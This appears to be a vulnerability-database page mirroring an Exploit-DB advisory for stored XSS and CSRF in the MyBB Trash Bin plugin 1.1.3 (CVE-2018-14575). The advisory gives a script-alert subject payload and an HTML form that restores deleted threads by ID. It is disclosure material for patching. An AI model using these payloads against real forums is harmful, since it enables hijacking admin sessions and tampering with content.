Lucene search
K

MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery

🗓️ 15 Feb 2019 00:00:00Reported by 0xB9Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 74 Views

Creates a trash bin in ACP to recover permanently deleted threads/posts. Allows XSS in thread/post subjects & CSRF to restore deleted posts

Related
Code
ReporterTitlePublishedViews
Family
0day.today
MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery
17 Feb 201900:00
zdt
Circl
CVE-2018-14575
21 Mar 201919:26
circl
CVE
CVE-2018-14575
17 Mar 201921:19
cve
Cvelist
CVE-2018-14575
17 Mar 201921:19
cvelist
EUVD
EUVD-2018-6482
7 Oct 202500:30
euvd
exploitpack
MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting Cross-Site Request Forgery
15 Feb 201900:00
exploitpack
NVD
CVE-2018-14575
21 Mar 201916:00
nvd
OSV
CVE-2018-14575
21 Mar 201916:00
osv
Packet Storm
MyBB Trash Bin 1.1.3 Cross Site Request Forgery / Cross Site Scripting
16 Feb 201900:00
packetstorm
Prion
Cross site request forgery (csrf)
21 Mar 201916:00
prion
Rows per page
# Exploit Title: MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / CSRF
# Date: 7/17/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=957
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-14575


1. Description:
Creates a trash bin in the ACP where you can recover permanent deleted threads and posts. The thread/post subjects allow XSS and deleted posts can be restored by CSRF.
 

2. Proof of Concept:

Cross-Site Scripting

- Create a new thread with the following subject  <script>alert('XSS')</script>
- Permanently delete that thread
- Alert is located in threads trash bin localhost/[path]/admin/index.php?module=tools-trashbin and localhost/admin/index.php?module=tools-trashbin&action=posts

- Reply to a post and change the subject to the following  <script>alert('XSS')</script>
- Permanently delete that post
- Alert is located in posts trash bin localhost/[path]/admin/index.php?module=tools-trashbin&action=posts


Cross-Site Request Forgery

<html>
	<body>
		<!-- Restore deleted threads & posts by thread/post ID -->
		<div class="popup_item_container"><a href="http://localhost/[path]/admin/index.php?module=tools-trashbin&action=threadrestore&tid=1" class="popup_item">Restore</a></div>
		<script type="text/javascript">
			$("#thread_1").popupMenu();
		</script>
	</body>
</html>

3. Solution:
Update to 1.1.4

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Feb 2019 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.8
CVSS 38.8
EPSS0.02377
74